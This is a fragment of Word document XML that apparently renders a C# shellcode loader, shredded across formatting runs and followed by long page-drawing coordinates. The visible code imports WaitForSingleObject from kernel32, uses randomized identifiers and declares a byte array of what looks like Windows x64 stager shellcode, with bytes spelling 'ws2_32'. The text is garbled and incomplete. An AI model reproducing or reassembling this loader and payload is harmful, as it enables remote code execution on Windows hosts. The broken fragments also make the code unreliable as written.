        <w:t>"kernel32"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private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static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extern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UInt32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WaitForSingleObje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ct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IntPtr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KqJNFlHpsKOV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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UInt32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EYBOArlCLAM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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public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yrDaTlg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(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{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13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="1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byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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2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QWKpWKhcs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=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{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0xfc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0x83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0xe4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0xf0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0xe8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0xcc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0x51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0x50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52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121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14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0x31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0xd2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0x65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0x8b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0x60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0x8b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0x18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x48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15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0x20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0x72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0xb7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0x4a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0x31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xc9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16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0x31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0xc0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0xac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0x3c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0x61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0x7c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0x02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0x2c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0x20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0xc1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x41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17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0xe2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0xed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0x52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0x20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0x8b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0x3c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x48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18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0xd0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0x66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0x78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0x18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0x02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0x85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0x72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x8b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19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0xc0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0x74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0x67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0x01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0xd0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x8b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20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0x18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0x44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0x20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0xd0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0xe3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x41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21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0x34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0x88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0xd6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0x31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0x31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0xc0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0xac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xc1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22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0x38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0xe0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0x75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0x4c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0x4c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0x24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x45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23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0x39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0xd1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0x75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0xd8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0x44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0x24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0x49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0xd0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0x66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x8b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24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0x44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0x1c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0xd0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0x04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x01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25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0xd0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0x58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0x5e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0x5a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0x58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0x59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x48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26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0xec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0x20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0xe0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0x58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0x59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0x12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xe9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27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0x49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0xbe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0x77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0x73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0x32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0x33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0x32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x00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28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0x49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0xe6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0xec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0xa0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xe5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29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0xbc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0x02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0x35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0xa8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0x04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0x54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xe4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520.111pt;margin-top:0.0pt;width:0.0pt;height:810.883pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16217">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16217" coordorigin="10402,0" coordsize="0,16217" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,7,10402,9,10402,12,10402,16,10402,21,10402,26,10402,32,10402,39,10402,47,10402,56,10402,66,10402,76,10402,89,10402,102,10402,117,10402,133,10402,150,10402,169,10402,189,10402,211,10402,234,10402,259,10402,286,10402,315,10402,345,10402,378,10402,412,10402,449,10402,487,10402,528,10402,570,10402,615,10402,663,10402,713,10402,765,10402,819,10402,876,10402,936,10402,999,10402,1064,10402,1132,10402,1202,10402,1276,10402,1353,10402,1432,10402,1515,10402,1601,10402,1690,10402,1782,10402,1877,10402,1976,10402,2078,10402,2184,10402,2293,10402,2406,10402,2522,10402,2642,10402,2766,10402,2894,10402,3026,10402,3161,10402,3300,10402,3444,10402,3592,10402,3743,10402,3899,10402,4060,10402,4224,10402,4393,10402,4567,10402,4744,10402,4927,10402,5114,10402,5306,10402,5502,10402,5704,10402,5910,10402,6121,10402,6337,10402,6558,10402,6784,10402,7015,10402,7252,10402,7493,10402,7740,10402,7993,10402,8251,10402,8514,10402,8783,10402,9057,10402,9337,10402,9623,10402,9915,10402,10212,10402,10516,10402,10825,10402,11140,10402,11462,10402,11789,10402,12123,10402,12463,10402,12809,10402,13161,10402,13520,10402,13886,10402,14258,10402,14636,10402,15021,10402,15413,10402,15812,10402,16217e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:18.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,370" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:370;width:8990;height:630" coordorigin="1490,370" coordsize="8990,630" path="m1510,384l1510,384,1510,384,1510,384,1510,384,1510,384,1510,384,1511,384,1512,384,1512,384,1514,384,1515,384,1517,384,1519,384,1521,384,1524,384,1528,384,1532,384,1536,384,1541,384,1546,384,1552,384,1559,384,1566,384,1575,384,1583,384,1593,384,1603,384,1615,384,1627,384,1640,384,1654,384,1668,384,1684,384,1701,384,1719,384,1738,384,1758,384,1780,384,1802,384,1826,384,1851,384,1877,384,1904,384,1933,384,1963,384,1995,384,2028,384,2063,384,2099,384,2136,384,2175,384,2216,384,2259,384,2303,384,2348,384,2396,384,2445,384,2496,384,2549,384,2604,384,2660,384,2719,384,2779,384,2841,384,2906,384,2972,384,3041,384,3112,384,3184,384,3259,384,3336,384,3416,384,3498,384,3582,384,3668,384,3757,384,3848,384,3941,384,4037,384,4136,384,4236,384,4340,384,4446,384,4555,384,4666,384,4780,384,4897,384,5017,384,5139,384,5264,384,5392,384,5523,384,5657,384,5793,384,5933,384,6076,384,6222,384,6370,384,6522,384,6677,384,6835,384,6997,384,7161,384,7329,384,7500,384,7675,384,7853,384,8034,384,8219,384,8407,384,8598,384,8793,384,8992,384,9194,384,9400,384,9609,384,9823,384,10039,384,10260,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,385,10484,385,10484,385,10484,385,10484,385,10484,385,10484,386,10484,386,10484,386,10484,387,10484,387,10484,388,10484,388,10484,389,10484,389,10484,390,10484,391,10484,392,10484,392,10484,393,10484,394,10484,395,10484,396,10484,398,10484,399,10484,400,10484,402,10484,403,10484,405,10484,406,10484,408,10484,410,10484,412,10484,414,10484,416,10484,418,10484,421,10484,423,10484,426,10484,428,10484,431,10484,434,10484,437,10484,440,10484,443,10484,446,10484,450,10484,453,10484,457,10484,461,10484,465,10484,469,10484,473,10484,478,10484,482,10484,487,10484,492,10484,497,10484,502,10484,507,10484,512,10484,518,10484,524,10484,530,10484,536,10484,542,10484,548,10484,555,10484,562,10484,569,10484,576,10484,583,10484,590,10484,598,10484,606,10484,614,10484,622,10484,630,10484,639,10484,648,10484,657,10484,666,10484,675,10484,685,10484,695,10484,705,10484,715,10484,726,10484,736,10484,747,10484,758,10484,770,10484,781,10484,793,10484,805,10484,817,10484,830,10484,842,10484,855,10484,869,10484,882,10484,896,10484,910,10484,924,10484,938,10484,953,10484,968,10484,983,10484,999,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10483,1015,10482,1015,10482,1015,10480,1015,10479,1015,10477,1015,10475,1015,10473,1015,10470,1015,10466,1015,10462,1015,10458,1015,10453,1015,10448,1015,10442,1015,10435,1015,10428,1015,10419,1015,10411,1015,10401,1015,10391,1015,10379,1015,10367,1015,10354,1015,10340,1015,10326,1015,10310,1015,10293,1015,10275,1015,10256,1015,10236,1015,10215,1015,10192,1015,10168,1015,10143,1015,10117,1015,10090,1015,10061,1015,10031,1015,9999,1015,9966,1015,9931,1015,9895,1015,9858,1015,9819,1015,9778,1015,9735,1015,9691,1015,9646,1015,9598,1015,9549,1015,9498,1015,9445,1015,9391,1015,9334,1015,9275,1015,9215,1015,9153,1015,9088,1015,9022,1015,8953,1015,8883,1015,8810,1015,8735,1015,8658,1015,8578,1015,8497,1015,8413,1015,8326,1015,8238,1015,8146,1015,8053,1015,7957,1015,7859,1015,7758,1015,7654,1015,7548,1015,7439,1015,7328,1015,7214,1015,7097,1015,6977,1015,6855,1015,6730,1015,6602,1015,6471,1015,6337,1015,6201,1015,6061,1015,5918,1015,5773,1015,5624,1015,5472,1015,5317,1015,5159,1015,4997,1015,4833,1015,4665,1015,4494,1015,4319,1015,4141,1015,3960,1015,3776,1015,3587,1015,3396,1015,3201,1015,3002,1015,2800,1015,2594,1015,2385,1015,2172,1015,1955,1015,1734,1015,1510,1015,1510,1015,1510,1015,1510,1015,1510,1014,1510,1014,1510,1014,1510,1014,1510,1014,1510,1014,1510,1014,1510,1014,1510,1014,1510,1014,1510,1014,1510,1013,1510,1013,1510,1013,1510,1013,1510,1012,1510,1012,1510,1012,1510,1011,1510,1011,1510,1010,1510,1009,1510,1009,1510,1008,1510,1007,1510,1006,1510,1005,1510,1004,1510,1003,1510,1002,1510,1001,1510,1000,1510,998,1510,997,1510,996,1510,994,1510,992,1510,991,1510,989,1510,987,1510,985,1510,983,1510,980,1510,978,1510,976,1510,973,1510,971,1510,968,1510,965,1510,962,1510,959,1510,956,1510,952,1510,949,1510,945,1510,942,1510,938,1510,934,1510,930,1510,925,1510,921,1510,916,1510,912,1510,907,1510,902,1510,897,1510,892,1510,886,1510,881,1510,875,1510,869,1510,863,1510,857,1510,850,1510,844,1510,837,1510,830,1510,823,1510,816,1510,808,1510,801,1510,793,1510,785,1510,777,1510,768,1510,760,1510,751,1510,742,1510,733,1510,723,1510,714,1510,704,1510,694,1510,684,1510,673,1510,662,1510,652,1510,640,1510,629,1510,618,1510,606,1510,594,1510,582,1510,569,1510,556,1510,543,1510,530,1510,517,1510,503,1510,489,1510,475,1510,460,1510,446,1510,431,1510,415,1510,400,1510,384e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:18.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,370" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:370;width:30;height:650" coordorigin="1490,370" coordsize="30,650" path="m1517,384l1517,384,1517,384,1517,384,1517,384,1517,384,1517,384,1517,384,1517,384,1517,384,1517,384,1517,385,1517,385,1517,385,1517,385,1517,385,1517,385,1517,386,1517,386,1517,386,1517,387,1517,387,1517,388,1517,388,1517,389,1517,389,1517,390,1517,391,1517,392,1517,392,1517,393,1517,394,1517,395,1517,396,1517,398,1517,399,1517,400,1517,402,1517,403,1517,405,1517,406,1517,408,1517,410,1517,412,1517,414,1517,416,1517,418,1517,421,1517,423,1517,426,1517,428,1517,431,1517,434,1517,437,1517,440,1517,443,1517,446,1517,450,1517,453,1517,457,1517,461,1517,465,1517,469,1517,473,1517,478,1517,482,1517,487,1517,492,1517,497,1517,502,1517,507,1517,512,1517,518,1517,524,1517,530,1517,536,1517,542,1517,548,1517,555,1517,562,1517,569,1517,576,1517,583,1517,590,1517,598,1517,606,1517,614,1517,622,1517,630,1517,639,1517,648,1517,657,1517,666,1517,675,1517,685,1517,695,1517,705,1517,715,1517,726,1517,736,1517,747,1517,758,1517,770,1517,781,1517,793,1517,805,1517,817,1517,830,1517,842,1517,855,1517,869,1517,882,1517,896,1517,910,1517,924,1517,938,1517,953,1517,968,1517,983,1517,999,1517,1015e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:670" coordorigin="1490,990" coordsize="8990,670" path="m1510,1015l1510,1015,1510,1015,1510,1015,1510,1015,1510,1015,1510,1015,1511,1015,1512,1015,1512,1015,1514,1015,1515,1015,1517,1015,1519,1015,1521,1015,1524,1015,1528,1015,1532,1015,1536,1015,1541,1015,1546,1015,1552,1015,1559,1015,1566,1015,1575,1015,1583,1015,1593,1015,1603,1015,1615,1015,1627,1015,1640,1015,1654,1015,1668,1015,1684,1015,1701,1015,1719,1015,1738,1015,1758,1015,1780,1015,1802,1015,1826,1015,1851,1015,1877,1015,1904,1015,1933,1015,1963,1015,1995,1015,2028,1015,2063,1015,2099,1015,2136,1015,2175,1015,2216,1015,2259,1015,2303,1015,2348,1015,2396,1015,2445,1015,2496,1015,2549,1015,2604,1015,2660,1015,2719,1015,2779,1015,2841,1015,2906,1015,2972,1015,3041,1015,3112,1015,3184,1015,3259,1015,3336,1015,3416,1015,3498,1015,3582,1015,3668,1015,3757,1015,3848,1015,3941,1015,4037,1015,4136,1015,4236,1015,4340,1015,4446,1015,4555,1015,4666,1015,4780,1015,4897,1015,5017,1015,5139,1015,5264,1015,5392,1015,5523,1015,5657,1015,5793,1015,5933,1015,6076,1015,6222,1015,6370,1015,6522,1015,6677,1015,6835,1015,6997,1015,7161,1015,7329,1015,7500,1015,7675,1015,7853,1015,8034,1015,8219,1015,8407,1015,8598,1015,8793,1015,8992,1015,9194,1015,9400,1015,9609,1015,9823,1015,10039,1015,10260,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1015,10484,1016,10484,1016,10484,1016,10484,1016,10484,1017,10484,1017,10484,1018,10484,1018,10484,1019,10484,1019,10484,1020,10484,1020,10484,1021,10484,1022,10484,1023,10484,1024,10484,1025,10484,1026,10484,1027,10484,1028,10484,1030,10484,1031,10484,1032,10484,1034,10484,1036,10484,1037,10484,1039,10484,1041,10484,1043,10484,1045,10484,1047,10484,1049,10484,1052,10484,1054,10484,1057,10484,1060,10484,1062,10484,1065,10484,1068,10484,1072,10484,1075,10484,1078,10484,1082,10484,1085,10484,1089,10484,1093,10484,1097,10484,1101,10484,1106,10484,1110,10484,1115,10484,1120,10484,1125,10484,1130,10484,1135,10484,1140,10484,1146,10484,1152,10484,1157,10484,1163,10484,1170,10484,1176,10484,1183,10484,1189,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1233,10484,1241,10484,1250,10484,1258,10484,1267,10484,1275,10484,1284,10484,1294,10484,1303,10484,1313,10484,1323,10484,1333,10484,1343,10484,1353,10484,1364,10484,1375,10484,1386,10484,1397,10484,1409,10484,1421,10484,1433,10484,1445,10484,1458,10484,1471,10484,1484,10484,1497,10484,1510,10484,1524,10484,1538,10484,1553,10484,1567,10484,1582,10484,1597,10484,1612,10484,1628,10484,1644,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10483,1660,10482,1660,10482,1660,10480,1660,10479,1660,10477,1660,10475,1660,10473,1660,10470,1660,10466,1660,10462,1660,10458,1660,10453,1660,10448,1660,10442,1660,10435,1660,10428,1660,10419,1660,10411,1660,10401,1660,10391,1660,10379,1660,10367,1660,10354,1660,10340,1660,10326,1660,10310,1660,10293,1660,10275,1660,10256,1660,10236,1660,10215,1660,10192,1660,10168,1660,10143,1660,10117,1660,10090,1660,10061,1660,10031,1660,9999,1660,9966,1660,9931,1660,9895,1660,9858,1660,9819,1660,9778,1660,9735,1660,9691,1660,9646,1660,9598,1660,9549,1660,9498,1660,9445,1660,9391,1660,9334,1660,9275,1660,9215,1660,9153,1660,9088,1660,9022,1660,8953,1660,8883,1660,8810,1660,8735,1660,8658,1660,8578,1660,8497,1660,8413,1660,8326,1660,8238,1660,8146,1660,8053,1660,7957,1660,7859,1660,7758,1660,7654,1660,7548,1660,7439,1660,7328,1660,7214,1660,7097,1660,6977,1660,6855,1660,6730,1660,6602,1660,6471,1660,6337,1660,6201,1660,6061,1660,5918,1660,5773,1660,5624,1660,5472,1660,5317,1660,5159,1660,4997,1660,4833,1660,4665,1660,4494,1660,4319,1660,4141,1660,3960,1660,3776,1660,3587,1660,3396,1660,3201,1660,3002,1660,2800,1660,2594,1660,2385,1660,2172,1660,1955,1660,1734,1660,1510,1660,1510,1660,1510,1660,1510,1660,1510,1660,1510,1660,1510,1660,1510,1660,1510,1660,1510,1660,1510,1660,1510,1659,1510,1659,1510,1659,1510,1659,1510,1659,1510,1659,1510,1658,1510,1658,1510,1658,1510,1657,1510,1657,1510,1656,1510,1656,1510,1655,1510,1655,1510,1654,1510,1653,1510,1652,1510,1651,1510,1650,1510,1649,1510,1648,1510,1647,1510,1646,1510,1645,1510,1643,1510,1642,1510,1640,1510,1639,1510,1637,1510,1635,1510,1633,1510,1631,1510,1629,1510,1627,1510,1625,1510,1623,1510,1620,1510,1617,1510,1615,1510,1612,1510,1609,1510,1606,1510,1603,1510,1600,1510,1596,1510,1593,1510,1589,1510,1585,1510,1581,1510,1577,1510,1573,1510,1569,1510,1564,1510,1559,1510,1555,1510,1550,1510,1545,1510,1539,1510,1534,1510,1528,1510,1523,1510,1517,1510,1511,1510,1505,1510,1498,1510,1492,1510,1485,1510,1478,1510,1471,1510,1464,1510,1456,1510,1449,1510,1441,1510,1433,1510,1425,1510,1416,1510,1408,1510,1399,1510,1390,1510,1381,1510,1371,1510,1362,1510,1352,1510,1342,1510,1332,1510,1321,1510,1310,1510,1299,1510,1288,1510,1277,1510,1265,1510,1253,1510,1241,1510,1229,1510,1217,1510,1204,1510,1191,1510,1177,1510,1164,1510,1150,1510,1136,1510,1122,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1015e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:50.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1010" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:1010;width:30;height:650" coordorigin="1490,1010" coordsize="30,650" path="m1517,1015l1517,1015,1517,1015,1517,1015,1517,1015,1517,1015,1517,1015,1517,1015,1517,1015,1517,1015,1517,1015,1517,1015,1517,1015,1517,1015,1517,1015,1517,1016,1517,1016,1517,1016,1517,1016,1517,1017,1517,1017,1517,1018,1517,1018,1517,1019,1517,1019,1517,1020,1517,1020,1517,1021,1517,1022,1517,1023,1517,1024,1517,1025,1517,1026,1517,1027,1517,1028,1517,1030,1517,1031,1517,1032,1517,1034,1517,1036,1517,1037,1517,1039,1517,1041,1517,1043,1517,1045,1517,1047,1517,1049,1517,1052,1517,1054,1517,1057,1517,1060,1517,1062,1517,1065,1517,1068,1517,1072,1517,1075,1517,1078,1517,1082,1517,1085,1517,1089,1517,1093,1517,1097,1517,1101,1517,1106,1517,1110,1517,1115,1517,1120,1517,1125,1517,1130,1517,1135,1517,1140,1517,1146,1517,1152,1517,1157,1517,1163,1517,1170,1517,1176,1517,1183,1517,1189,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1233,1517,1241,1517,1250,1517,1258,1517,1267,1517,1275,1517,1284,1517,1294,1517,1303,1517,1313,1517,1323,1517,1333,1517,1343,1517,1353,1517,1364,1517,1375,1517,1386,1517,1397,1517,1409,1517,1421,1517,1433,1517,1445,1517,1458,1517,1471,1517,1484,1517,1497,1517,1510,1517,1524,1517,1538,1517,1553,1517,1567,1517,1582,1517,1597,1517,1612,1517,1628,1517,1644,1517,1660e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:82.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1650" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:1650;width:8990;height:630" coordorigin="1490,1650" coordsize="8990,630" path="m1510,1660l1510,1660,1510,1660,1510,1660,1510,1660,1510,1660,1510,1660,1511,1660,1512,1660,1512,1660,1514,1660,1515,1660,1517,1660,1519,1660,1521,1660,1524,1660,1528,1660,1532,1660,1536,1660,1541,1660,1546,1660,1552,1660,1559,1660,1566,1660,1575,1660,1583,1660,1593,1660,1603,1660,1615,1660,1627,1660,1640,1660,1654,1660,1668,1660,1684,1660,1701,1660,1719,1660,1738,1660,1758,1660,1780,1660,1802,1660,1826,1660,1851,1660,1877,1660,1904,1660,1933,1660,1963,1660,1995,1660,2028,1660,2063,1660,2099,1660,2136,1660,2175,1660,2216,1660,2259,1660,2303,1660,2348,1660,2396,1660,2445,1660,2496,1660,2549,1660,2604,1660,2660,1660,2719,1660,2779,1660,2841,1660,2906,1660,2972,1660,3041,1660,3112,1660,3184,1660,3259,1660,3336,1660,3416,1660,3498,1660,3582,1660,3668,1660,3757,1660,3848,1660,3941,1660,4037,1660,4136,1660,4236,1660,4340,1660,4446,1660,4555,1660,4666,1660,4780,1660,4897,1660,5017,1660,5139,1660,5264,1660,5392,1660,5523,1660,5657,1660,5793,1660,5933,1660,6076,1660,6222,1660,6370,1660,6522,1660,6677,1660,6835,1660,6997,1660,7161,1660,7329,1660,7500,1660,7675,1660,7853,1660,8034,1660,8219,1660,8407,1660,8598,1660,8793,1660,8992,1660,9194,1660,9400,1660,9609,1660,9823,1660,10039,1660,10260,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1660,10484,1661,10484,1661,10484,1661,10484,1661,10484,1662,10484,1662,10484,1662,10484,1663,10484,1663,10484,1664,10484,1664,10484,1665,10484,1666,10484,1666,10484,1667,10484,1668,10484,1669,10484,1670,10484,1671,10484,1672,10484,1673,10484,1675,10484,1676,10484,1677,10484,1679,10484,1680,10484,1682,10484,1684,10484,1686,10484,1688,10484,1690,10484,1692,10484,1694,10484,1696,10484,1699,10484,1701,10484,1704,10484,1707,10484,1709,10484,1712,10484,1716,10484,1719,10484,1722,10484,1726,10484,1729,10484,1733,10484,1737,10484,1741,10484,1745,10484,1749,10484,1753,10484,1758,10484,1763,10484,1767,10484,1772,10484,1777,10484,1783,10484,1788,10484,1794,10484,1799,10484,1805,10484,1811,10484,1818,10484,1824,10484,1831,10484,1837,10484,1844,10484,1851,10484,1859,10484,1866,10484,1874,10484,1882,10484,1890,10484,1898,10484,1906,10484,1915,10484,1924,10484,1933,10484,1942,10484,1951,10484,1961,10484,1971,10484,1981,10484,1991,10484,2001,10484,2012,10484,2023,10484,2034,10484,2045,10484,2057,10484,2069,10484,2081,10484,2093,10484,2105,10484,2118,10484,2131,10484,2144,10484,2158,10484,2171,10484,2185,10484,2200,10484,2214,10484,2229,10484,2244,10484,2259,10484,2274,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10483,2290,10482,2290,10482,2290,10480,2290,10479,2290,10477,2290,10475,2290,10473,2290,10470,2290,10466,2290,10462,2290,10458,2290,10453,2290,10448,2290,10442,2290,10435,2290,10428,2290,10419,2290,10411,2290,10401,2290,10391,2290,10379,2290,10367,2290,10354,2290,10340,2290,10326,2290,10310,2290,10293,2290,10275,2290,10256,2290,10236,2290,10215,2290,10192,2290,10168,2290,10143,2290,10117,2290,10090,2290,10061,2290,10031,2290,9999,2290,9966,2290,9931,2290,9895,2290,9858,2290,9819,2290,9778,2290,9735,2290,9691,2290,9646,2290,9598,2290,9549,2290,9498,2290,9445,2290,9391,2290,9334,2290,9275,2290,9215,2290,9153,2290,9088,2290,9022,2290,8953,2290,8883,2290,8810,2290,8735,2290,8658,2290,8578,2290,8497,2290,8413,2290,8326,2290,8238,2290,8146,2290,8053,2290,7957,2290,7859,2290,7758,2290,7654,2290,7548,2290,7439,2290,7328,2290,7214,2290,7097,2290,6977,2290,6855,2290,6730,2290,6602,2290,6471,2290,6337,2290,6201,2290,6061,2290,5918,2290,5773,2290,5624,2290,5472,2290,5317,2290,5159,2290,4997,2290,4833,2290,4665,2290,4494,2290,4319,2290,4141,2290,3960,2290,3776,2290,3587,2290,3396,2290,3201,2290,3002,2290,2800,2290,2594,2290,2385,2290,2172,2290,1955,2290,1734,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2289,1510,2289,1510,2289,1510,2289,1510,2288,1510,2288,1510,2288,1510,2287,1510,2287,1510,2286,1510,2286,1510,2285,1510,2284,1510,2284,1510,2283,1510,2282,1510,2281,1510,2280,1510,2279,1510,2278,1510,2277,1510,2275,1510,2274,1510,2273,1510,2271,1510,2270,1510,2268,1510,2266,1510,2264,1510,2262,1510,2260,1510,2258,1510,2256,1510,2254,1510,2251,1510,2249,1510,2246,1510,2243,1510,2241,1510,2238,1510,2234,1510,2231,1510,2228,1510,2224,1510,2221,1510,2217,1510,2213,1510,2209,1510,2205,1510,2201,1510,2197,1510,2192,1510,2187,1510,2183,1510,2178,1510,2173,1510,2167,1510,2162,1510,2156,1510,2151,1510,2145,1510,2139,1510,2132,1510,2126,1510,2119,1510,2113,1510,2106,1510,2099,1510,2091,1510,2084,1510,2076,1510,2068,1510,2060,1510,2052,1510,2044,1510,2035,1510,2026,1510,2017,1510,2008,1510,1999,1510,1989,1510,1979,1510,1969,1510,1959,1510,1949,1510,1938,1510,1927,1510,1916,1510,1905,1510,1893,1510,1881,1510,1869,1510,1857,1510,1845,1510,1832,1510,1819,1510,1806,1510,1792,1510,1779,1510,1765,1510,1750,1510,1736,1510,1721,1510,1706,1510,1691,1510,1676,1510,1660e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:82.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1650" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:1650;width:30;height:630" coordorigin="1490,1650" coordsize="30,630" path="m1517,1660l1517,1660,1517,1660,1517,1660,1517,1660,1517,1660,1517,1660,1517,1660,1517,1660,1517,1660,1517,1660,1517,1660,1517,1660,1517,1660,1517,1661,1517,1661,1517,1661,1517,1661,1517,1662,1517,1662,1517,1662,1517,1663,1517,1663,1517,1664,1517,1664,1517,1665,1517,1666,1517,1666,1517,1667,1517,1668,1517,1669,1517,1670,1517,1671,1517,1672,1517,1673,1517,1675,1517,1676,1517,1677,1517,1679,1517,1680,1517,1682,1517,1684,1517,1686,1517,1688,1517,1690,1517,1692,1517,1694,1517,1696,1517,1699,1517,1701,1517,1704,1517,1707,1517,1709,1517,1712,1517,1716,1517,1719,1517,1722,1517,1726,1517,1729,1517,1733,1517,1737,1517,1741,1517,1745,1517,1749,1517,1753,1517,1758,1517,1763,1517,1767,1517,1772,1517,1777,1517,1783,1517,1788,1517,1794,1517,1799,1517,1805,1517,1811,1517,1818,1517,1824,1517,1831,1517,1837,1517,1844,1517,1851,1517,1859,1517,1866,1517,1874,1517,1882,1517,1890,1517,1898,1517,1906,1517,1915,1517,1924,1517,1933,1517,1942,1517,1951,1517,1961,1517,1971,1517,1981,1517,1991,1517,2001,1517,2012,1517,2023,1517,2034,1517,2045,1517,2057,1517,2069,1517,2081,1517,2093,1517,2105,1517,2118,1517,2131,1517,2144,1517,2158,1517,2171,1517,2185,1517,2200,1517,2214,1517,2229,1517,2244,1517,2259,1517,2274,1517,2290e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:113.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2270" coordsize="8990,650">
